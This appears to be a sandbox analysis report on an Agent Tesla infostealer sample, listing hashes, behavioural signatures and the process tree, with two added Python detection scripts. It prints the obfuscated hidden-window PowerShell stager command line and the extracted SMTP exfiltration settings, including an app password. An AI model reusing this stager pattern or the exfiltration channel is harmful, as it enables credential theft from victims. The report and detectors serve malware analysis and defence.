Analysis
- max time kernel: 146s
- max time network: 147s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 12-06-2024 02:07
Static task: static1
Behavioral task: behavioral1
- Sample: MSK872314.exe
- Resource: win7-20240220-en
Behavioral task: behavioral2
- Sample: MSK872314.exe
- Resource: win10v2004-20240508-en
General
- Target: MSK872314.exe
- Size: 630KB
- MD5: 397c71ddf48527dc363407c2dc6382fd
- SHA1: 8d309abbd3842e15778dad790e3bb36371060eab
- SHA256: fd2ed2817b36ad04fda64c952b1a38e9a4cee86a247d0a7e9dfea5bab81b2e82
- SHA512: a5b4bf00e115c99a2433ebf7f91ea7fc12e6c5a6f06d049d89b9027b29bba769ec51d3ace6a1671595d685db7e74e458cb75e39fe8c1abb9533ae19d0c308a46
- SSDEEP: 12288:jgSUrka1W50Dt/RtlieB6TxOL0w83/ImkT4bdxrVZ4PBiFeAUVABi+ksSj:hfaQ50DljNNow83gkbTBSYUK/ksSj
Malware Config
Extracted (family not labelled in this entry)
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: oadc jzrw bmvr klnl
Extracted: agenttesla
- Protocol: smtp
- Host: smtp.gmail.com
- Port: 587
- Username: [email protected]
- Password: oadc jzrw bmvr klnl
- Email To: [email protected]
Both entries describe the same exfiltration channel: harvested data is sent as e-mail through Gmail's submission port (587, STARTTLS). The 16-letter, four-group password is the format of a Google app password rather than the account's login password. The sender and recipient addresses are redacted in this export.
Signatures
- AgentTesla
  Agent Tesla is a .NET-based remote access tool (RAT) and information stealer written in Visual Basic (VB.NET); the SMTP settings in the extracted config above are its exfiltration channel.
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with a hidden window (-windowstyle hidden). The command line (see the process tree below) reads a dropped file, takes the three characters at offset 50997 of it as a command name, and dot-invokes that command with the whole file content as its argument, so the name of the executing cmdlet or alias never appears on the command line.
- Loads dropped DLL (2 IoCs)
  PID   Process
  3064  powershell.exe
  2424  Delggeres.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow  IoC
  6     api.ipify.org
  7     api.ipify.org
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID   Process
  2424  Delggeres.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID   Process
  3064  powershell.exe
  2424  Delggeres.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 3064 (powershell.exe) set thread context of PID 2424 (Delggeres.exe)
  Together with the WriteProcessMemory and MapViewOfSection entries for the same PIDs, this is the process-hollowing pattern: powershell.exe starts Delggeres.exe, writes into its address space, and redirects its thread to the written code.
- Drops file in Program Files directory (2 IoCs)
  File opened for modification  C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini  (MSK872314.exe)
  File opened for modification  C:\Program Files (x86)\Common Files\boltholes.obl  (MSK872314.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  PID   Process         Count
  3064  powershell.exe  8
  2424  Delggeres.exe   2
- Suspicious behavior: MapViewOfSection (1 IoC)
  PID   Process
  3064  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  PID   Process         Token
  3064  powershell.exe  SeDebugPrivilege
  2424  Delggeres.exe   SeDebugPrivilege
- Suspicious use of WriteProcessMemory (14 IoCs)
  Source PID  Source process  Target PID  Target process  Count
  3032        MSK872314.exe   3064        powershell.exe  4
  3064        powershell.exe  2596        cmd.exe         4
  3064        powershell.exe  2424        Delggeres.exe   6
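The extracted config and the api.ipify.org flows together describe Agent Tesla's exfiltration: learn the victim's public IP, then mail the harvested credentials through smtp.gmail.com:587. The following Python is an added detection example, not part of the sandbox report. The Sysmon-style event tuples are constructed, and attributing the traffic to Delggeres.exe is an assumption, since the report's flow IoCs carry no process name. It correlates an IP-lookup DNS query with a subsequent SMTP connection from a process that is not a mail client, and marks whether the endpoint matches the extracted config.

```python
from datetime import datetime, timedelta

# From the report: the IP-lookup host in the flow IoCs and the SMTP endpoint in
# the extracted config.  Extend IP_LOOKUP_HOSTS with other lookup services as needed.
IP_LOOKUP_HOSTS = {"api.ipify.org"}
EXTRACTED_SMTP = ("smtp.gmail.com", 587)
SMTP_PORTS = {25, 465, 587}
# Processes expected to speak SMTP; anything else doing so is worth a look.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed Sysmon-style events (timestamp, image, event, destination, port).
# Attributing the traffic to the injected Delggeres.exe is an assumption; the
# report lists the ipify flows without a process.
EVENTS = [
    ("2024-06-12T02:09:01", "Delggeres.exe", "dns", "api.ipify.org", None),
    ("2024-06-12T02:09:02", "Delggeres.exe", "connect", "api.ipify.org", 443),
    ("2024-06-12T02:09:05", "Delggeres.exe", "dns", "smtp.gmail.com", None),
    ("2024-06-12T02:09:06", "Delggeres.exe", "connect", "smtp.gmail.com", 587),
    ("2024-06-12T02:15:00", "outlook.exe", "connect", "smtp.gmail.com", 587),
    ("2024-06-12T02:16:00", "chrome.exe", "dns", "api.ipify.org", None),
]


def find_exfil_sequences(events, window=timedelta(minutes=10)):
    """Flag a non-mail-client process that resolves an IP-lookup service and then
    opens an SMTP submission connection within `window`.  Returns
    (image, smtp_host, port, matches_extracted_config) tuples."""
    hits = []
    last_lookup = {}  # image -> time of its most recent IP-lookup query
    for ts, image, event, dst, port in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if event == "dns" and dst in IP_LOOKUP_HOSTS:
            last_lookup[image] = t
        elif (event == "connect" and port in SMTP_PORTS
              and image.lower() not in MAIL_CLIENTS):
            seen = last_lookup.get(image)
            if seen is not None and t - seen <= window:
                hits.append((image, dst, port, (dst, port) == EXTRACTED_SMTP))
    return hits


def smtp_from_unexpected_process(events):
    """Weaker but broader check: any SMTP connection from a non-mail-client,
    regardless of the IP lookup.  Useful as a hunting query when DNS logs are missing."""
    return sorted({
        (image, dst, port) for _, image, event, dst, port in events
        if event == "connect" and port in SMTP_PORTS and image.lower() not in MAIL_CLIENTS
    })


if __name__ == "__main__":
    print("correlated:", find_exfil_sequences(EVENTS))
    print("any smtp:", smtp_from_unexpected_process(EVENTS))
```

The correlated check is the precise one (ipify lookup, then SMTP from the same image); the second function is what you would run first over a fleet where DNS logging is spotty, then triage the hits by image and parent.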
Processes
- C:\Users\Admin\AppData\Local\Temp\MSK872314.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\MSK872314.exe"
  PID: 3032
  Signatures: Drops file in Program Files directory; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Forretningsforbindelserne=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Insider\Pigout.Smr';$Sheetwise=$Forretningsforbindelserne.SubString(50997,3);.$Sheetwise($Forretningsforbindelserne)"
    PID: 3064
    Signatures: Command and Scripting Interpreter: PowerShell; Loads dropped DLL; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
      PID: 2596
      (^^ is an escaped caret, so cmd evaluates 1^0, a bitwise XOR; the result is not used.)
    - C:\Users\Admin\AppData\Local\Temp\Delggeres.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Delggeres.exe"
      PID: 2424
      Signatures: Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
The SysWOW64 paths show that the whole chain runs as 32-bit (WOW64) processes on the x64 image, and the PowerShell stage is launched from the user's AppData drop directory rather than from the sample's own location.
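The stager command line and the injection IoCs above can be triaged without detonating anything. The following Python is an added example, not part of the sandbox report: it parses the Get-Content / SubString / dot-invoke pattern out of the command line, reproduces which characters of the dropped file would become the command name (the real Pigout.Smr is not on the page, so a stand-in whose offset 50997 holds the alias iex is constructed as an assumption), and rebuilds the injection edges from the WriteProcessMemory and SetThreadContext tables to flag the parent/child pair that shows both, which is the process-hollowing pattern.

```python
import re
from collections import defaultdict

# Stager command line exactly as the sandbox recorded it for PID 3064.
STAGER_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$Forretningsforbindelserne=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Insider\Pigout.Smr';$Sheetwise=$Forretningsforbindelserne.SubString(50997,3);.$Sheetwise($Forretningsforbindelserne)"'''

# Constructed stand-in for the dropped Pigout.Smr (not on the page): filler up to
# offset 50997, then the three characters the stager will dot-invoke.  Using the
# alias "iex" here is an assumption about what such a loader puts at that offset.
PAYLOAD_STUB = "#" * 50997 + "iex" + " # ...the staged script would follow here"

_GET_CONTENT = re.compile(r"Get-Content\s+'([^']+)'", re.IGNORECASE)
_SUBSTRING = re.compile(r"\.SubString\((\d+)\s*,\s*(\d+)\)", re.IGNORECASE)
_DOT_INVOKE = re.compile(r"\.\$\w+\s*\(")          # .$var(...) invokes the command named in $var
_HIDDEN = re.compile(r"-w\w*\s+h(?:idden)?\b", re.IGNORECASE)  # -windowstyle hidden, -w h, ...


def parse_stager_cmdline(cmdline):
    """Pull the dropped-file path and the SubString(offset, length) out of the stager."""
    path = _GET_CONTENT.search(cmdline)
    sub = _SUBSTRING.search(cmdline)
    return {
        "hidden_window": bool(_HIDDEN.search(cmdline)),
        "payload_path": path.group(1) if path else None,
        "offset": int(sub.group(1)) if sub else None,
        "length": int(sub.group(2)) if sub else None,
        "dot_invoke": bool(_DOT_INVOKE.search(cmdline)),
    }


def is_stager(cmdline):
    """Hidden window + Get-Content of a file + SubString + dot-invoke of a variable:
    the command name lives inside the data file, not on the command line."""
    info = parse_stager_cmdline(cmdline)
    return (info["hidden_window"] and info["payload_path"] is not None
            and info["offset"] is not None and info["dot_invoke"])


def invoked_token(payload_text, offset, length):
    """Reproduce .SubString(offset, length) on the dropped file to learn what the
    stager would invoke, without invoking it.  Assumes the file is a single line,
    so Get-Content yields one string rather than an array."""
    return payload_text[offset:offset + length]


# Injection IoCs copied from the report's WriteProcessMemory / SetThreadContext
# tables (duplicates removed).
INJECTION_LOG = """\
PID 3032 wrote to memory of 3064 3032 MSK872314.exe powershell.exe
PID 3064 wrote to memory of 2596 3064 powershell.exe cmd.exe
PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe
PID 3064 set thread context of 2424 3064 powershell.exe Delggeres.exe
"""

_EDGE = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+) \d+ (\S+) (\S+)")


def parse_injection_edges(text):
    """Map (src_pid, src_name, dst_pid, dst_name) -> set of actions seen between them."""
    edges = defaultdict(set)
    for m in _EDGE.finditer(text):
        src, action, dst, src_name, dst_name = m.groups()
        edges[(int(src), src_name, int(dst), dst_name)].add(action)
    return edges


def hollowing_candidates(edges):
    """A parent that both writes a child's memory and replaces its thread context is
    the classic hollowing / SetThreadContext injection pattern; return those pairs."""
    wanted = {"wrote to memory of", "set thread context of"}
    return sorted(key for key, actions in edges.items() if wanted <= actions)


if __name__ == "__main__":
    info = parse_stager_cmdline(STAGER_CMDLINE)
    print(info)
    print("invoked token:", invoked_token(PAYLOAD_STUB, info["offset"], info["length"]))
    print("hollowing:", hollowing_candidates(parse_injection_edges(INJECTION_LOG)))
```

On a real host the same parser gives you the path to pull from disk; reading the token at the recorded offset tells you what the rest of the file is fed to, and the remainder of the file is the next stage to decode by hand.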
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 49KB
  MD5: 5b666f06cc1e9de33f4f56e415241506
  SHA1: 8253f4854a516d91f9ac7189d108cfe2822f5a2b
  SHA256: 9c121e08561368b3fabba2fef46f73a398fd27b54ae7a9b511d1e782cd50dfef
  SHA512: e2f444a080037474a69ecdff6545638a0a173a3e7230046f4e0a3b659511516806d13c406267d570d7b2006d7e9efbb91b8fbc02996d9ee31ffa801b5e7027f9
- Filesize: 310KB
  MD5: f96b7a4776a6d23f3a50da5897f86911
  SHA1: 839f9621509a37133fedf3465944999a5c88b8bf
  SHA256: 7d6c274ad802ad0f166f4cd6bf1a72e289d55900481105029c8146265e969b29
  SHA512: 7f6befad553bcd030d48b5cade86c26394f3ae306abef0bf6f34eca72756947f85d1983874c993a237bfdc585b41d7bd73e8147cc2084c631df157226229580e
- Filesize: 630KB (the submitted sample; hashes match the General section above)
  MD5: 397c71ddf48527dc363407c2dc6382fd
  SHA1: 8d309abbd3842e15778dad790e3bb36371060eab
  SHA256: fd2ed2817b36ad04fda64c952b1a38e9a4cee86a247d0a7e9dfea5bab81b2e82
  SHA512: a5b4bf00e115c99a2433ebf7f91ea7fc12e6c5a6f06d049d89b9027b29bba769ec51d3ace6a1671595d685db7e74e458cb75e39fe8c1abb9533ae19d0c308a46